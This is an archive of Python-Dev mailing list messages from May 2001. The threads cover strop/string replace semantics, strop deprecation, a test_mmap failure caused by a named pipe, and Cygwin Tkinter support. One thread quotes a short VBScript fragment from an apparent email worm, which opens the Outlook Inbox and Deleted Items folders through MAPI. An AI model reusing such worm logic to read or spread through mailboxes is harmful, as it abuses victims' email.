From mike.mellor at tbe.com Thu May 10 02:16:28 2001
From: mike.mellor at tbe.com (mike.mellor at tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Python 2.1 installed). While I can run command line programs, Tkinter is not part of the package. TCL/TK is installed and I have been able to build TK GUI's.
How can I get Tkinter added to my Python package? Thanks.

Mike

From tim.one at home.com Thu May 10 02:47:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID:

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules (in out-of-synch copies of mymemreplace), and every time I think I fix something "the other" module breaks. The above appears to be why.

My opinion: the test_strop.py test is in error, and so was strop_replace() in stropmodule.c. I'm checking in changes accordingly, but won't mind getting yelled at if you disagree.

From greg at cosc.canterbury.ac.nz Thu May 10 02:56:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To:
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters:

>     PyObject *t = (PyObject *)op;
>     PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

    PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz     +--------------------------------------+

From guido at digicool.com Thu May 10 04:00:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
References:
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck. Somebody remind me why we have both stropmodule.c and
> stringobject.c? These bugs exist in both.

In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com Thu May 10 04:01:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com>
References: <9dcmks+6aqf@eGroups.com>
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Python 2.1
> installed). While I can run command line programs, Tkinter is not
> part of the package. TCL/TK is installed and I have been able to
> build TK GUI's. How can I get Tkinter added to my Python package?
> Thanks.

Beats me. Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From tim.one at home.com Thu May 10 03:07:40 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID:

>>     PyObject *t = (PyObject *)op;
>>     PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
>     PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line .

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim

From gward at python.net Thu May 10 03:08:58 2001
From: gward at python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete. We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more. (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3.

I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.)

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!
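Greg's "warn when imported, except when imported by string.py" idea can be sketched with the standard warnings module. This is a minimal, hypothetical sketch in modern Python 3, not Guido's unreleased patch: the helper name warn_if_direct_import and the convention of passing in the importer's module name are assumptions, since working out who is doing the import is exactly the part Greg left open.

```python
import warnings


def warn_if_direct_import(importer_name: str) -> None:
    """Hypothetical helper a deprecated module (e.g. strop) could call.

    Emits a DeprecationWarning unless the importer is the one sanctioned
    caller, assumed here to be the module named "string".
    """
    if importer_name != "string":
        warnings.warn(
            "the strop module is deprecated; use string methods instead",
            DeprecationWarning,
            stacklevel=2,  # attribute the warning to the caller, not this helper
        )


# Record warnings instead of printing them, so they can be inspected.
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    warn_if_direct_import("string")     # sanctioned importer: no warning
    warn_if_direct_import("my_script")  # direct use: one DeprecationWarning

print(len(caught), caught[0].category.__name__)  # prints: 1 DeprecationWarning
```

Using DeprecationWarning (rather than a plain UserWarning) lets users silence or escalate the message with ordinary warning filters, which fits the "one release with a deprecation warning" plan.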
From guido at digicool.com Thu May 10 04:12:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
References:
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
>
>     test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)
>
> string_tests.py has this:
>
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
>
> IOW, the test suite insists that
>
>     strop.replace('one!two!three!', '!', '@', 0)
>
> replace all matches but that
>
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
>
> replace nothing.
>
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks. The above appears to be why.
>
> My opinion: the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c. I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py.

I think this change was made for the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry!
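For reference, the two count conventions under discussion can be checked in modern Python 3, which kept the string-method rule: a count of 0 replaces nothing, and a negative count (Tim's "-1 == infinity") replaces everything. The strop_style_replace() wrapper below is a hypothetical illustration of the legacy strop rule that 0 meant "replace all"; it is not strop's actual code.

```python
def strop_style_replace(s: str, old: str, new: str, count: int = 0) -> str:
    """Hypothetical emulation of the legacy strop.replace() count rule.

    In strop, count == 0 meant "replace every occurrence"; str.replace()
    expresses that with a negative count instead.
    """
    return s.replace(old, new, -1 if count == 0 else count)


s = "one!two!three!"

# str.replace(): a count of 0 replaces nothing...
assert s.replace("!", "@", 0) == "one!two!three!"
# ...while omitting count, or passing a negative one, replaces everything.
assert s.replace("!", "@") == "one@two@three@"
assert s.replace("!", "@", -1) == "one@two@three@"
# A positive count caps the number of replacements.
assert s.replace("!", "@", 2) == "one@two@three!"

# The emulated strop rule: 0 means "all".
assert strop_style_replace(s, "!", "@", 0) == "one@two@three@"
```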
--Guido van Rossum (home page: http://www.python.org/~guido/)

From tim.one at home.com Thu May 10 03:13:20 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID:

[Guido]
> In my mind, strop is obsolete. We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more. (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years .

cheeredly y'rs - tim

From guido at digicool.com Thu May 10 04:25:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca>
References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca>
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py. (No idea how you'd
> implement that, I'm just spouting off.) Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it into 2.2a0, so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all! (Ie.
imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com Thu May 10 04:27:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
References:
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete. We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more. (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
>
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years .

Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)

From tim.one at home.com Thu May 10 03:33:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID:

[Guido]
> HMMMMMM! In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop. In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none. The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made for the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer .
> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either. So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again.

From tim.one at home.com Thu May 10 04:00:30 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID:

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all. Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch.
As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake-ly y'rs - tim

From Jason.Tishler at dothill.com Thu May 10 04:06:15 2001
From: Jason.Tishler at dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Python 2.1
> > installed). While I can run command line programs, Tkinter is not
> > part of the package. TCL/TK is installed and I have been able to
> > build TK GUI's. How can I get Tkinter added to my Python package?
> > Thanks.
>
> Beats me. Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge.
Norman Vine has built a Cygwin Python that supports Tkinter. See the following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler at dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com

From tim.one at home.com Thu May 10 04:54:45 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID:

I checked in a change to mmapmodule.c earlier today, to close a patch complaining about unused vrbl warnings. Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self, PyObject *args)
{
    char value;
    char *where;
    CHECK_VALID(NULL);
    if (!PyArg_ParseTuple(args, ":read_byte"))
        return NULL;
    if (self->pos < self->size) {
        where = self->data + self->pos;
        value = (char) *(where);
        self->pos += 1;
        return Py_BuildValue("c", (char) *(where));
    } else {
        PyErr_SetString (PyExc_ValueError, "read byte out of range");
        return NULL;
    }
}

and after:

mmap_read_byte_method(mmap_object *self, PyObject *args)
{
    CHECK_VALID(NULL);
    if (!PyArg_ParseTuple(args, ":read_byte"))
        return NULL;
    if (self->pos < self->size) {
        char value = self->data[self->pos];
        self->pos += 1;
        return Py_BuildValue("c", value);
    } else {
        PyErr_SetString (PyExc_ValueError, "read byte out of range");
        return NULL;
    }
}

I'll be damned if I can see any semantic difference, and test_mmap worked fine on Windows after the change.
But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an mmap'ed file yet, let alone tried to read from it. The only thing test_mmap did so far is (the first comment is bogus -- that's the builtin Python open() function):

    # Create an mmap'ed file
    # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)
    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under current CVS? Fred, are you *sure* it fails for you -- if so, does the problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs - tim

From jeremy at digicool.com Thu May 10 05:17:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To:
References:
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system. No problem with test_mmap. But test_pty does fail with some complaints about FCNTL, which Fred just removed. Maybe Fred is working in an alternate universe where test_mmap and test_pty are swapped.

Jeremy

From barry at digicool.com Thu May 10 06:08:42 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References:
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters writes:

    TP> Oh, fuck. Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c? These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop.

>>>>> "GvR" == Guido van Rossum writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all. Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry

From fredrik at pythonware.com Thu May 10 08:22:53 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References:
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code. Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong". Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
>
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale. If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.
as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
>
> For a given number of characters or bytes ?

characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters.

Cheers /F

From thomas at xs4all.net Thu May 10 11:31:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)
[..]
> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.)

-- 
Thomas Wouters

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!
From MarkH at ActiveState.com Thu May 10 12:36:13 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID:

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about
> Outlook to
> know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

olFolderCalendar      =0x9   # from enum OlDefaultFolders
olFolderContacts      =0xa   # from enum OlDefaultFolders
olFolderDeletedItems  =0x3   # from enum OlDefaultFolders
olFolderDrafts        =0x10  # from enum OlDefaultFolders
olFolderInbox         =0x6   # from enum OlDefaultFolders
olFolderJournal       =0xb   # from enum OlDefaultFolders
olFolderNotes         =0xc   # from enum OlDefaultFolders
olFolderOutbox        =0x4   # from enum OlDefaultFolders
olFolderSentMail      =0x5   # from enum OlDefaultFolders
olFolderTasks         =0xd   # from enum OlDefaultFolders

So it appears the inbox and deleted items.

Mark.

From tim.one at home.com Thu May 10 10:54:42 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID:

> python ../lib/test/regrtest.py test___all__
test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious sequence of failing imports manages to leave behind a damaged module object in sys.modules that prevents test___all__'s import of tty from getting the ImportError it *ought* to get under Windows (and betting termios is the ultimate culprit).

I've fixed enough of these. Somebody who thinks this is "a feature" gets to do it this time .
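Mark Hammond's makepy output in the "Homepage" reply above answers Thomas's question: the script's GetDefaultFolder(6) and GetDefaultFolder(3) calls open the Inbox and Deleted Items folders. As a small sketch, those constants can be kept in a standard-library IntEnum for reverse lookup. This is plain Python 3, needs neither Outlook nor the win32com makepy tool, and the class simply transcribes the values Mark listed; the class name mirrors the OlDefaultFolders enum name from his output.

```python
from enum import IntEnum


class OlDefaultFolders(IntEnum):
    """Values transcribed from the makepy.py output quoted above."""
    olFolderDeletedItems = 0x3
    olFolderOutbox = 0x4
    olFolderSentMail = 0x5
    olFolderInbox = 0x6
    olFolderCalendar = 0x9
    olFolderContacts = 0xA
    olFolderJournal = 0xB
    olFolderNotes = 0xC
    olFolderTasks = 0xD
    olFolderDrafts = 0x10


# Reverse lookup for the two GetDefaultFolder() arguments in the script.
for code in (6, 3):
    print(code, OlDefaultFolders(code).name)
# prints:
# 6 olFolderInbox
# 3 olFolderDeletedItems
```

Because IntEnum members compare equal to plain ints, a member such as OlDefaultFolders.olFolderInbox could be passed wherever the raw number 6 is expected.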
From guido at digicool.com Thu May 10 15:43:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
References:
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all. Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code. Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong". Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale. If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either. What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.
We remove stropmodule.c, and replace it with a strop.py that issues a warning and then imports selected things from string.py. The only complication is that there are a few constants and one function in strop that are still imported into string.py; I propose to move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com Thu May 10 16:02:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com>
References: <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system. No problem with
> test_mmap. But test_pty does fail with some complaints about FCNTL,
> which Fred just removed. Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange. They *both* work for me with the latest CVS (and even after removing all *.pyc files!), although last night (?) I recall seeing a test_pty failure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From skip at pobox.com Thu May 10 16:16:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all. Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and won't be fixed...
:-)

Skip

From skip at pobox.com Thu May 10 16:32:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To:
References:
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can only make a suggestion for others who look into this problem. Try this: Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails. You should get the actual module that failed to import. If foo.py consists of simply "import bar", and I import it, I see that bar couldn't be imported:

    >>> try:
    ...     import foo
    ... except ImportError, msg:
    ...     print msg
    ...
    No module named bar

Skip

From fdrake at acm.org Thu May 10 16:57:59 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To:
References:
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
> But having suffered too many "impossible problems" the last 36 hours, my
> confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under
> current CVS? Fred, are you *sure* it fails for you -- if so, does the
> problem actually go away if you revert mmapmodule.c?

It was indeed showing the behavior I described!
I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-)

While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message.

This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do?

-Fred

-- 
Fred L. Drake, Jr.
